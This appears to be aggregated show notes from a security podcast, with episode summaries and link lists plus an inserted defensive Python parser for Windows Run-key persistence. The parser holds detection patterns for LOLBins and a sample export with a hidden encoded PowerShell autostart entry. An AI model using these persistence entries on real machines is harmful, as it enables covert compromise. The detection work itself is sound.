http://www.instructables.com/id/Getting-past-Software-Restriction-Policies/
http://www.itingredients.com/how-to-deploy-software-restriction-policy-gpo/
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-018-software_restriction_policy-applocker.mp3 #iTunes Link: https://itunes.apple.com/us/podcast/2016-018-software-restriction/id799131292?i=1000368338483&mt=2 #Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969
05 May 2020 | 2020-017-Cameron Smith, business decisions, and how it affects Security | 01:08:05
Layer8conference is virtual (https://layer8conference.com/layer-8-is-online-this-year/)
https://csrc.nist.gov/publications/detail/sp/800-171/rev-1/final
CMMC: https://info.summit7systems.com/blog/cmmc
https://www.comptia.org/certifications/project - Project+
Cameron Smith: www.twitter.com/secnomancer
Cybersmith.com - Up by 14 April
https://en.wikipedia.org/wiki/Christopher_Voss https://www.amazon.com/Never-Split-Difference-Negotiating-Depended/dp/0062407805 https://www.masterclass.com/classes/chris-voss-teaches-the-art-of-negotiation
https://www.autopsy.com/support/training/covid-19-free-autopsy-training/ https://www.youtube.com/playlist?list=PLg_QXA4bGHpvsW-qeoi3_yhiZg8zBzNwQ
“There is nothing noble in being superior to your fellow man; true nobility is being superior to your former self.” ― Ernest Hemingway https://www.goodreads.com/quotes/76281-there-is-nothing-noble-in-being-superior-to-your-fellow
Original B-Sides Talk Blurb
SITREP: A Consultant's Perspective from the Trenches of InfoSec
In this session you will hear war stories and lessons learned consulting for hundreds of clients across dozens of verticals at every level, from bootstrapped startups with garage beginnings to Fortune 50 companies and everything in between. We will cover life on the front lines in InfoSec, ranging from individual contributions and staying relevant in a rapidly evolving field all the way to how bad most orgs are at InfoSec and what we can do as practitioners to help make them better.
Speaking Goal
After my presentation is over, I want my audience to...
...so that ...
Intro
Security really isn't as complicated as most people think
Establish Credibility
Very Large Company Examples
Government Examples
Small Company Examples
23 Jun 2014 | OWASP Top Ten: 1-5 | 00:49:49
We finished up the OWASP Top Ten List. We discussed Injection, XSS, and other goodness. Find out what makes the Top 5 so special.
http://risky.biz/fss_idiots - Risky Business Interview concerning Direct Object Reference and First State Superannuation
http://oauth.net/2/ - Great information on OAUTH 2.0.
16 Dec 2021 | 2021-045-Mick Douglas, Log4j vulnerabilities, egress mitigations - part 1 | 00:36:01
Introduction
Overview of Log4j vuln (as of 16 December 2021)
Why is it a big deal? (impact/criticality/risk)
Talk about patching vs. mitigation
Why wasn’t this given the same visibility in 2009? Because it’s Oracle or Java?
Good callout is building slides to brief org leadership, detections, and other educational tools.
Vuln fatigue (Java vulns in 2009 and pretty much forever cause us fatigue)
Are there other technologies like log4j that prop up the entire world, and we just don’t know?
Egress traffic (discussed at length on twitter, what problems does it solve?) https://twitter.com/mubix/status/1470430085169745920
Latest: https://www.theregister.com/2021/12/14/apache_log4j_v2_16_jndi_disabled_default/ - Apache removed JNDI functionality
https://www.reddit.com/r/blueteamsec/comments/rd38z9/log4j_0day_being_exploited/ <- great aggregation
https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/
https://issues.apache.org/jira/plugins/servlet/mobile#issue/LOG4J2-313
Lots of discussion about “SBOM solving the issue”. @K8em0 weighs in https://twitter.com/k8em0/status/1469437490691932164
https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592 - list of advisories for log4j
Mitigation: https://twitter.com/brunoborges/status/1469186875608875011
2009 in fact, #CVE-2009-1094, then a bypass was fixed in CVE-2018-3149: https://bugzilla.redhat.com/show_bug.cgi?id=1639834. That's when the JDK was fully protected, but other implementations remained vulnerable https://bugzilla.redhat.com/show_bug.cgi?id=1639834 OpenJDK…
https://twitter.com/ThinkstCanary/status/1469439743905697797?s=20 You can use a point & click canarytoken from https://canarytokens.org to help test for the #log4j / #Log4Shell issue. 1) visit https://canarytokens.org; 2) choose the Log4shell token; 3) enter the email address you wish to be notified at; 4) copy/use the returned string...
Discussed in 2016 at Blackhat: https://twitter.com/th3_protoCOL/status/1469644923028656130 The #Log4Shell attack vector was known since 2016…
Just got off phone with a client. Log4j is in their network. Vendor claims patch will be available next release... which is multiple months from now. Here's what you do if you're in this situation. 1. Keep calm. There's no need to panic. 2. Carefully read this thread.
When dealing with attacks like this you should remember the acronym IMMA. I = Isolate, M = Minimize, M = Monitor, A = Active Defense
https://github.com/MarkBaggett/srum-dump “SRUM Dump extracts information from the System Resource Utilization Management Database and creates an Excel spreadsheet. The SRUM is one of the best sources for applications that have run on your system in the last 30 days and is invaluable to your incident investigations! To use the tool you will need a copy of the SRUM (located in c:\windows\system32\sru\srudb.dat, but locked by the OS). This tool also requires a SRUM_TEMPLATE that defines table and field names. You can optionally provide the SOFTWARE registry hive and the tool will tell you which wireless networks were in use by applications. If you are looking for a version of this tool that creates CSV files instead of an Excel spreadsheet, dumps targeted tables or processes any ese then check out ese2csv. ese2csv.exe is designed specifically for csv files with the CLI user in mind.”
16 May 2016 | 2016-019-Creating proper business cases and justifications | 00:54:43
Procurement is a process. Often a long, drawn-out, tedious process, but it is necessary to ensure that hardware and software are going to be what works in your organization. We go over what is necessary to make sure your procurement is as smooth as possible. Some of the topics we discuss include:
1. Aligning business goals and operational goals
2. How to discuss ROI with management
3. Getting actionable information for business requirements from affected parties
4. Steering yourself away from confirmation bias or optimism bias, and ensuring you're thinking critically when comparing the current status quo vs. a new solution
5. Information you might want to gather from potential vendors to make a more informed decision as to whether their product is the one you want
And finally, we discuss how to handle the dreaded vendor demos. There may be a number of them, and they are arguably the best method of knowing whether the software or hardware is going to work for you. This is a topic that affects everyone, whether you are a manager or a user of the technology involved.
We also like to remind people that our DerbyCon CTF and raffle are still going on. There is plenty of time to get involved if you want a chance to get a ticket to DerbyCon 2016!
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-019-business_cases_and_justifications-final.mp3
YouTube Link: https://youtu.be/8sWn1IYpgtY
Links referred to in the show:
http://www.ask.com/business-finance/business-justification-example-cdebe6f929949e8c
http://www.iso20022.org/documents/BJ/BJ044/ISO20022BJ_ATICA_v4_with_comments.pdf
http://klariti.com/business-case-2/business-case-justify-business-need/
https://en.wikipedia.org/wiki/Business_case
https://en.wikipedia.org/wiki/Optimism_bias
http://www.ehow.com/how_6672801_write-business-justification.html
http://www.acqnotes.com/acqnote/careerfields/establishing-software-requirements
21 Nov 2021 | Blumira Sponsor #3 - Emily Eubanks, more actionable events, incident response help, and more | 00:53:23
In this sponsored BDS episode, Bryan Brake and Amanda Berlin interview Emily Eubanks, a Security Operations Analyst for #Blumira. We discuss common business risks like IT staff turnover, a lack of Incident Response procedures, choosing not to follow PowerShell best practices, and MFA use for critical or sensitive applications. We also discuss ways to improve security posture to mitigate these risks as well as how Blumira can help organizations in light of these common business challenges.
https://www.reddit.com/r/cybersecurity/comments/qao73j/we_are_a_security_team_with_20_years_of_ethical/
https://attack.mitre.org/mitigations/M1032/ https://techcommunity.microsoft.com/t5/azure-active-directory-identity/your-pa-word-doesn-t-matter/ba-p/731984 https://www.yubico.com/blog/otp-vs-u2f-strong-to-stronger/
https://www.nist.gov/cyberframework/respond https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf
https://www.blumira.com/analysis-of-a-threat-powershell-malicious-activity/ https://docs.microsoft.com/en-us/mem/configmgr/apps/deploy-use/learn-script-security https://devblogs.microsoft.com/powershell/secrets-management-module-vault-extensions/ https://www.reddit.com/r/PowerShell/comments/g3b9h5/how_are_you_managing_secrets/
ADDITIONAL LINKS AND SOURCES:
[1] https://docs.microsoft.com/en-us/mem/configmgr/apps/deploy-use/learn-script-security
[2] https://www.reddit.com/r/PowerShell/comments/g3b9h5/how_are_you_managing_secrets/
[3] https://github.com/PowerShell/SecretManagement
[4] https://devblogs.microsoft.com/powershell/secrets-management-module-vault-extensions/
[5] https://www.nist.gov/cyberframework/respond
[6] https://attack.mitre.org/mitigations/M1032/
[7] https://techcommunity.microsoft.com/t5/azure-active-directory-identity/your-pa-word-doesn-t-matter/ba-p/731984
[8] https://www.zdnet.com/article/microsoft-urges-users-to-stop-using-phone-based-multi-factor-authentication/
[9] https://www.yubico.com/blog/otp-vs-u2f-strong-to-stronger/
22 Sep 2014 | Marcus J. Carey, FireDrillMe, and the Rockstars of Infosec | 00:35:42
Marcus J. Carey, a security researcher and software developer, came on to talk to us about FireDrill.me, a tool used to help people work out their Incident Response muscles. He is also the creator of threatagent.com. Marcus is well known in Security circles, and after we talked to him about FireDrill and ThreatAgent, we got his opinion on other subjects that interested us in the Infosec industry. Marcus is a man of his own mind, and he certainly did not disappoint. Hope you enjoy Part 1 of our conversation with him. We also asked him about the celebrity that many in the industry face, and how it should be handled by people in the industry.
HoneyDocs - http://www.pcworld.com/article/2048881/honeydocs-lays-irresistible-bait-for-hackers.html
Malcolm Gladwell - http://en.wikipedia.org/wiki/Malcolm_Gladwell
11 Oct 2020 | 2020-037-Katie Moussouris, Implementing VCMM, diversity in job descriptions - Part 2 | 00:39:18
Introduce Katie (bio) (@k8em0) CEO and Owner, LutaSecurity
The scope of the VCMM (what is it?)
VCMM - Vulnerability Coordination Maturity Model https://www.lutasecurity.com/vcmm
Just covers the internal process? To ready an org for a bug bounty program or to accept vulns from security researchers?
You mentioned not playing whack-a-mole, when it comes to responding at the beginning of a vuln disclosure program. Is the directing of different categories of bugs one of the things that goes into not having to just wait for the bugs to roll in?
What’s the timeline for this process? “We need something for a product launch next week…”
Stakeholders involved? CISO? Security team? IT? Devs?
What precipitates the need for this? Maturity? Vuln Disclosure?
Are the ISO docs required for this to work, or will they assist in an easier outcome?
https://blog.rapid7.com/2017/12/19/nist-cyber-framework-revised-to-include-coordinated-vuln-disclosure-processes/
10 worst jobs (popsci article): https://web.archive.org/web/20070712070214/https://www.popsci.com/popsci/science/0203101256a23110vgnvcm1000004eecbccdrcrd.html
How does an org use this to communicate vulnerabilities in their own products?
What’s the bare minimum you need on this chart for a successful program? Are any facets more important than the others?
Does anyone hit all 3s, or is that a pipedream?
Incentive: “no legal action will be taken”. People want money… not tours, not 10-point font. How do you convince ‘good’ bug writers to want to help you for a ‘thank you’? Should incentive be a ‘Level 3’ or would you consider it not ready for prime-time?
https://www.zdnet.com/article/yahoo-changes-bug-bounty-policy-following-t-shirt-gate/
Vuln reporting
Lots of Twitter fodder of companies that handle vuln disclosure poorly; some folks even say that you shouldn’t bother and should deal with a 3rd party instead.
If a company is taking bugs and doing all the baseline items, what are some other things they could do to make security disclosure easier?
Clearly stated bugs@ or security@ (and not buried in 3 point font in the privacy policy, or ToS)
SLA to reply to all bugs?
Standardized disclosure form for discoveries?
Slide Presentation Overview: https://7bb97855-c50f-4dce-9a1c-325268684c64.filesusr.com/ugd/ed9b4b_f04d16446542494887906777a39204bf.pdf
ISO 29147:2018 - $150 USD https://www.iso.org/standard/72311.html
ISO 30111:2019 - $95 USD https://www.iso.org/standard/69725.html
ISO 27034-7:2018 - $150 USD https://www.iso.org/standard/66229.html
29 Apr 2019 | 2019-016-Conference announcement, and password spray defense | 00:46:11
Agenda:
Announce the conference
CFP: up soon
CFW: up soon
Campers: Friday night/Saturday night. Like “toorcamp”, but if it sucks, you can drive home… :D
Limiting tickets, looking for sponsors
To support the conference and future initiatives: “Infosec Education Foundation” 501c3 non-profit (we are working on the charity part)
Password spraying https://github.com/dafthack/DomainPasswordSpray
Stories:
https://blog.stealthbits.com/using-stealthdefend-to-defend-against-password-spraying/
http://blog.quadrasystems.net/post/password-spray-attacks-and-four-sure-steps-to-disrupt-them
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/simplifying-password-spraying/
Detecting one-to-many... and at what point/threshold during an attack would it be a PITA for the red team to slow down to?
Annoying NXLog CE limitation
Log-MD can help detect? Yep
CTF Club is happening again. Pinkie Pie is running it. Saturdays at 2-3 pm
20 Oct 2014 | Keep Calm and take a tcpdump! :) | 00:38:20
Tcpdump is just one of the tools that will make troubleshooting network issues, or testing applications, or even finding out what traffic is being generated on a host all that much easier. This podcast is to help you understand the Tcpdump program, and how powerful it is...
http://danielmiessler.com/study/tcpdump/
http://www.thegeekstuff.com/2010/08/tcpdump-command-examples/
http://www.tecmint.com/12-tcpdump-commands-a-network-sniffer-tool/
http://www.amazon.com/TCP-Illustrated-Vol-Addison-Wesley-Professional/dp/0201633469
http://www.computerhope.com/unix/tcpdump.htm
http://www.commandlinefu.com/commands/using/tcpdump -- excellent examples
http://www.amazon.com/Practical-Packet-Analysis-Wireshark-Real-World/dp/1593272669/
01 Dec 2014 | Part 2 w/ Ben Donnelly -- Introducing Ball and Chain (making password breaches a thing of the past) | 00:37:41
Last week, we talked with Ben Donnelly about ADHD (Active Defense Harbinger Distro). But Ben isn't a one-trick pony, oh no... this young punk is trying to solve fundamental problems in the business industry, in particular securing passwords. That's why he, working with Tim Tomes (@lanmaster53), invented 'Ball and Chain', which is a large (>2TB) file that can be used to help generate passwords and entropy.
29 Sep 2014 | Marcus J. Carey Interview Part 2 - China, IP, coming cyber war | 00:47:08
We finished up our odyssey with Marcus J. Carey this week. We picked his brain about how he feels about China, the coming cyberwar, and what kinds of tools he uses in his toolbox (hint: he doesn't use Kali). We also talk a bit about the entitlement of people, and what makes folks in poorer countries turn to hacking. We really enjoyed hearing his take on certifications and education. He's a Ruby nut, but suggests that people learn Python. He also talks about how he teaches people about security: the little everyday things that show you do security. A thought-provoking interview that will definitely inspire you to pour yourself into a Python book, or to grab a Raspberry Pi and start learning.
26 Jan 2021 | 2021-003-Danny Akacki, open communications, mergers & acquisitions | 00:46:09
Discussion on Mergers and acquisitions processes
On being acquired, but also if you’re acquiring a company
Best Practices
Best Practices of Mergers and Acquisitions (workforce.com)
The Role of Information Security in a Merger/Acquisition (bankinfosecurity.com)
Security Considerations in the Merger/Acquisition Process (sans.org)
Women Unite Over CTF 3.0 (ittakesahuman.com)
The 10 steps to successful M&A integration | Bain & Company
Savvy Hackers Use Spearphishing to steal Wall Street M&A info (knowbe4.com)
“We’ve been acquired by X!” First thing people think: “what’s gonna happen to me.”
27 Jun 2016 | 2016-025-Windows Registry, Runkeys, and where malware likes to hide | 00:50:48
The Windows registry has come a long way from its humble beginnings in #Windows 3.11 (Windows for Workgroups). This week, we discuss the structure of the Windows registry, as well as some of the inner workings of the registry itself. We also discuss some good places to look for malware, some of the key values that you can find in the #registry, and their meanings. We also discuss what atomicity is and how the registry is a lot like a database in how it functions. And no podcast about Windows #forensics should be done without talking about a tool, and our friend David #Longenecker (@dnlongen on Twitter) created a cross-platform tool that allows you to take exports of the registry and analyze them without needing to be physically on the host. You can find reglister here: http://www.securityforrealpeople.com/2015/08/introducing-new-forensics-tool-reglister.html
We finish up discussing our #DerbyCon giveaways and a peek at what will be a very interesting podcast next week. Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-025-Windows_Registry-RunKey_artifacts-finding_where_malware_hides.mp3 iTunes: https://itunes.apple.com/us/podcast/2016-025-windows-registry/id799131292?i=1000371465676&mt=2
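A worked example added here (not the podcast's own code and not reglister): an offline parser for a regedit .reg export that pulls every value under the classic autostart keys (Run, RunOnce, Policies\Explorer\Run, Winlogon) and flags the launch patterns the episode is about: binaries dropped in user-writable folders, LOLBin launchers such as rundll32 and powershell, and encoded PowerShell. The sample export is constructed for this example, and the key list and heuristics are this example's own choices. One caveat for real exports: regedit writes UTF-16LE with a BOM, so decode the file with encoding="utf-16" before handing the text to the parser.

```python
"""Offline triage of Windows autostart ("Run key") entries in a .reg export.
Added example, not from the episode and not reglister's code: the sample
export, the key list and the heuristics are this example's own choices."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Autostart locations checked here (a subset of the ASEPs Autoruns covers).
AUTOSTART_KEY_RE = re.compile(
    r"\\CurrentVersion\\(Run|RunOnce|RunOnceEx|RunServices|RunServicesOnce)$"
    r"|\\Policies\\Explorer\\Run$|\\CurrentVersion\\Winlogon$", re.IGNORECASE)
# Heuristics: user-writable drop folders, script/LOLBin launchers, encoded PS.
USER_WRITABLE_RE = re.compile(r"\\(Temp|Downloads|Users\\Public|\$Recycle\.Bin)\\", re.I)
LOLBIN_RE = re.compile(
    r"\b(rundll32|regsvr32|mshta|wscript|cscript|powershell|pwsh|cmd)(\.exe)?\b", re.I)
ENCODED_PS_RE = re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I)

@dataclass
class AutostartEntry:
    key: str
    name: str
    command: str
    reasons: list[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)

def unescape_reg(raw: str) -> str:
    # .reg exports escape backslash and double quote with a backslash.
    return re.sub(r'\\(["\\])', r"\1", raw)

def decode_hex2(raw: str) -> str:
    # hex(2) is REG_EXPAND_SZ: comma-separated UTF-16LE bytes, NUL-terminated.
    data = bytes(int(b, 16) for b in raw.split(":", 1)[1].split(",") if b)
    return data.decode("utf-16-le").rstrip("\x00")

def parse_reg_export(text: str) -> list[AutostartEntry]:
    """Return every string value under an autostart key in a decoded export."""
    entries: list[AutostartEntry] = []
    key = None
    lines = iter(text.splitlines())
    for line in lines:
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        if key is None or not AUTOSTART_KEY_RE.search(key):
            continue
        m = re.match(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$', line)
        if not m:
            continue
        name = "(Default)" if m.group(1) is None else unescape_reg(m.group(1))
        value = m.group(2)
        while value.endswith("\\"):            # hex data wraps with a trailing '\'
            value = value[:-1] + next(lines, "").strip()
        if value.startswith('"') and value.endswith('"'):
            command = unescape_reg(value[1:-1])  # REG_SZ
        elif value.lower().startswith("hex(2):"):
            command = decode_hex2(value)         # REG_EXPAND_SZ
        else:
            continue                             # dword:/hex: blobs are not commands
        entries.append(AutostartEntry(key, name, command))
    return entries

def triage(entries: list[AutostartEntry]) -> list[AutostartEntry]:
    """Attach a reason to every entry that matches a persistence heuristic."""
    for e in entries:
        if USER_WRITABLE_RE.search(e.command):
            e.reasons.append("launches from a user-writable location")
        if LOLBIN_RE.search(e.command):
            e.reasons.append("script or LOLBin launcher")
        if ENCODED_PS_RE.search(e.command):
            e.reasons.append("encoded PowerShell command")
    return entries

# Constructed sample export: fictitious values, realistic paths and escaping.
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ctfmon"=hex(2):25,00,77,00,69,00,6e,00,64,00,69,00,72,00,25,00,5c,00,73,00,\
  79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,63,00,74,00,66,00,6d,00,6f,\
  00,6e,00,2e,00,65,00,78,00,65,00,00,00
"VMware User Process"="\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\" -n vmusr"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"WindowsUpdate"="C:\\Users\\alice\\AppData\\Local\\Temp\\svchost.exe"
"Loader"="rundll32.exe C:\\Users\\Public\\Libraries\\cache.dll,DllMain"
"Sync"="powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden"=dword:00000001
'''

if __name__ == "__main__":
    for e in triage(parse_reg_export(SAMPLE_EXPORT)):
        print("SUSPECT" if e.suspicious else "ok     ", e.name, "->", e.command, e.reasons)
```

Run as a script it prints one line per autostart entry with the reasons it was flagged. The parser also handles REG_EXPAND_SZ values, which regedit writes as hex(2) UTF-16LE bytes wrapped across continuation lines, so the ctfmon entry decodes to %windir%\system32\ctfmon.exe. The heuristics are a triage aid, not a verdict: AppData\Local is also where OneDrive legitimately autostarts, which is why the path list deliberately stops at Temp, Downloads, Users\Public and the Recycle Bin.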
SoundCloud: https://soundcloud.com/bryan-brake Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast #Twitter: @brakesec @boettcherpwned @bryanbrake #Facebook: https://www.facebook.com/BrakeingDownSec/ #Tumblr: http://brakeingdownsecurity.tumblr.com/ #Player.FM : https://player.fm/series/brakeing-down-security-podcast #Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr #TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
07 Dec 2020 | SPONSORED - Nathanael Iversen from Illumio, future of microsegmentation | 00:36:30
BrakeSec Sponsored Interview with Nathanael Iversen
Illumio Nathanael Iversen BDS Podcast Messaging
Topic: Overview of development and deployment of micro-segmentation
Where does segmentation fit into your security strategy?
The keys to a successful micro-segmentation deployment: As with any security control, it’s important to balance the strategy of the business with the need to secure it. There are several key functions and abilities to consider to ensure your deployment goes smoothly:
There are three broad preventive security actions:
Potential questions:
12 Jan 2021 | 2021-001-news, YouTuber 'Dream' doxxed, SolarWinds passwords bruteforced, malware attacks | 00:46:57
Dream Doxxed: Minecraft YouTuber Dream Doxxed Following Speedrun Controversy (screenrant.com)
OSINT issues… found him by breadcrumbs and using Zillow internal pics of his house. Craziness.
How to Use APIs (explained from scratch) (secjuice.com)
Hackers target cryptocurrency users with new ElectroRAT malware | ZDNet
Cobalt Strike and Metasploit accounted for a quarter of all malware C&C servers in 2020 | ZDNet
29 May 2016 | 2016-021: Carbon Black's CTO Ben Johnson on EDR, the layered approach, and threat intelligence | 00:57:38
Ben Johnson (@chicagoben on Twitter) has spent a good deal of time working on protecting clients' endpoints, from his work at the NSA to co-founding Carbon Black (@carbonblack_inc). We managed to have him on to discuss EDR (#Endpoint Detection and Response), TTPs (#Tactics, Techniques, and Procedures), and the #Threat #Intelligence industry. Ben discusses with us the Layered Approach to EDR:
1. Hunting
2. Automation
3. Integration
4. Retrospection
5. Patterns of Attack/Detection
6. Indicator-based detection
7. Remediation
8. Triage
9. Visibility
We also discuss how VirusTotal's changes in policy regarding sharing of information are going to affect the threat intel industry. Ben also discusses his opinion of our "Moxie vs. Mechanisms" podcast, where businesses spend too much on shiny boxes vs. people. Brakesec apologizes for the audio issues during minute 6 and minute 22. Google Hangouts was not kind to us :(
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-021-Ben_Johnson-Carbon_black-Threat_intelligence.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-021-carbon-blacks-cto/id799131292?i=1000369579669&mt=2
YouTube: https://youtu.be/I10R3BeGDs4
RSS: http://www.brakeingsecurity.com/rss
Show notes: https://docs.google.com/document/d/12Rn-p1u13YlmOORTYiM5Q2uKT5EswVRUj4BJVX7ECHA/edit?usp=sharing (great info)
https://roberthurlbut.com/blog/make-threat-modeling-work-oreilly-2016
01 Feb 2022 | Bit of news, Belarus train system hack, VMware Horizon vulns, edge network device vulns | 00:43:54
News articles we covered this week:
https://www.wired.com/story/belarus-railways-ransomware-hack-cyber-partisans/
https://www.hackingarticles.in/linux-privilege-escalation-polkit-cve-2021-3560/
https://old.reddit.com/r/msp/comments/s48iji/vmware_horizon_servers_being_actively_hit_with/
Whimmery's Walkthroughs: Join @whimmery on her Twitch or on the @brakesec YouTube channel for walkthroughs on Burp Suite training and more!
Twitter handles:
Bryan Brake: @bryanbrake
27 May 2023 | Bsides Seattle and Austin, SecureBoot patch, and more | 01:12:36
07 Apr 2020 | 2020-013-part 2, education security, ransomware, April Mardock, Nathan McNulty, and Jared Folkins | 01:02:21
April Mardock - CISO - Seattle Public Schools Jared Folkins - IT Engineer - Bend La Pine Schools Nathan McNulty - Information Security Architect - Beaverton School District
OpSecEdu - https://www.opsecedu.com/ Slack
https://www.a4l.org/default.aspx
BEC - https://www.trendmicro.com/vinfo/us/security/definition/business-email-compromise-(bec)
https://www.k12cybersecurityconference.org/
Bypassing security controls - https://www.goguardian.com/blog/technology/how-students-bypass-school-web-filters-and-how-to-stop-them/
https://community.spiceworks.com/topic/2077711-chromebook-google-docs-bypassing-filters https://www.mobicip.com/blog/here%E2%80%99s-how-kids-bypass-apple%E2%80%99s-parental-control-tools
https://www.phantomts.com/2020/01/11/kids-can-bypass-communication-limit-feature-on-ios-13-3/
https://www.ocregister.com/2009/02/17/students-accused-of-changing-grades-using-teachers-password/
Security persons at education institutions of varying sizes.
https://www.zdnet.com/article/texas-school-district-falls-for-scam-email-hands-over-2-3-million/
Why are schools soft targets? Is money/budget the reason schools get the raw deal here? Why is ransomware such an appealing attack?
How complex is the school environment?
Adding technology too quickly? Outpacing the infrastructure in schools?
Just ideas for some questions. - Jared
Do you find vendors are very responsive in the education space when receiving a vulnerability report?
Has the technology stack in your various school systems changed much in the last 10 years? Have you moved to cloud-based, or do you still have an IT shack at the school systems with physical machines?
Localadmins are not granted… (excellent!)
29 Aug 2017 | 2017-030-Vulnerability OSINT, DerbyCon CTF walkthrough, and BSides Wellington! | 00:52:37
This week, we discuss the lack of information about certain vulnerabilities and where you might find more of it. It seems like many companies fail to give out necessary and actionable information unless you pay an arm and a leg. We also go over our DerbyCon CTF walkthrough, and discuss the steps to solve it.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-030-vulnerability_OSINT-derbycon_CTF_walkthrough.mp3
Ms. Berlin is going to be at Bsides Wellington! Get your Tickets NOW!
RSS: http://www.brakeingsecurity.com/rss Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw #iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2 #Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.signup.team #iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/ #SoundCloud: https://www.soundcloud.com/bryan-brake Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://player.fm/series/brakeing-down-security-podcast #Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr #TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/ --show notes--
NCC Group talks in Seattle
NIST guidelines (SP 800-63B): no security questions, no SMS-based 2FA
Vuln OSINT
Sites have information like Spokeo… Breadcrumbs
Take Java for example (CVE-2017-10102): info is sparse. Other sites have more:
https://tools.cisco.com/security/center/viewAlert.x?alertId=54521 - worse than Oracle’s site (impressive crappery)
Some are better: RHEL is fairly decent https://access.redhat.com/errata/RHSA-2017:2424
Ubuntu has some different tidbits https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-10102.html
Arch has info https://security.archlinux.org/CVE-2017-10102
Point is, just because you use a specific OS, don’t limit yourself… other OSes may contain more technical info. Some maintainers like to dig, like you.
https://vuldb.com/ - gives an estimated value for a PoC of a vuln (5-25K USD for CVE-2017-10102)
Derbycon CTF walkthrough
Looking for an instructor for an ‘intro to RE’ course.
Dr. Pulaski = Diana Muldaur
Dr. Crusher = Gates McFadden
04 Sep 2017 | 2017-031-Robert_Sell-Defcon_SE_CTF-OSINT_source | 01:03:47
This week, we met up with Robert Sell to discuss competing in the DefCon Social Engineering CTF. You're gonna learn how he prepared for the competition, and learn about some of the tactics you could use to compete in future SE CTF events. Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-031-Robert_Sell-Defcon-SE-CTF.mp3
29 Apr 2020 | 2020-016-Cameron Smith, Business decisions and their (in)secure outcomes - Part 1 | 00:49:20
Layer8conference is virtual (https://layer8conference.com/layer-8-is-online-this-year/) https://csrc.nist.gov/publications/detail/sp/800-171/rev-1/final
CMMC: https://info.summit7systems.com/blog/cmmc
https://www.comptia.org/certifications/project - Project+
Cameron Smith = www.twitter.com/secnomancer
Cybersmith.com - up by 14 April
https://en.wikipedia.org/wiki/Christopher_Voss https://www.amazon.com/Never-Split-Difference-Negotiating-Depended/dp/0062407805 https://www.masterclass.com/classes/chris-voss-teaches-the-art-of-negotiation
https://www.autopsy.com/support/training/covid-19-free-autopsy-training/ https://www.youtube.com/playlist?list=PLg_QXA4bGHpvsW-qeoi3_yhiZg8zBzNwQ
“There is nothing noble in being superior to your fellow man; true nobility is being superior to your former self.” ― Ernest Hemingway https://www.goodreads.com/quotes/76281-there-is-nothing-noble-in-being-superior-to-your-fellow
Original B-Sides Talk Blurb
SITREP: A Consultant's Perspective from the Trenches of InfoSec
In this session you will hear war stories and lessons learned consulting for hundreds of clients across dozens of verticals at every level, from bootstrapped startups with garage beginnings to Fortune 50 companies and everything in between. We will cover life on the front lines in InfoSec, ranging from individual contributions and staying relevant in a rapidly evolving field all the way to how bad most orgs are at InfoSec and what we can do as practitioners to help make them better.
Speaking Goal
After my presentation is over, I want my audience to...
...so that ...
Intro
Security really isn't as complicated as most people think
Establish Credibility
Very Large Company Examples
Government Examples
Small Company Examples
26 Apr 2022 | news, farmers affected by ransomware, protestware for the 3rd time, trusting opensource | 00:51:40
https://www.cyberscoop.com/dhs-bug-bounty-122-vulnerabilities-27-critical-hackers/
https://securityaffairs.co/wordpress/130564/hacking/atlassian-jira-authentication-bypass-issue.html
https://confluence.atlassian.com/jira/jira-security-advisory-2022-04-20-1115127899.html
https://www.coalfire.com/the-coalfire-blog/research-reveals-cyber-risk-is-the-best-language
https://www.cnet.com/tech/mobile/verizon-wireless-customers-report-outages-across-us/
https://www.infosecurity-magazine.com/news/fbi-warns-us-farmers-of-ransomware/
https://securityaffairs.co/wordpress/130497/security/cyber-insurance-global-riskenvironment.html
https://securityaffairs.co/wordpress/130443/hacking/cisco-umbrella-default-ssh-key.html
https://www.helpnetsecurity.com/2022/04/19/open-source-usage-trends/
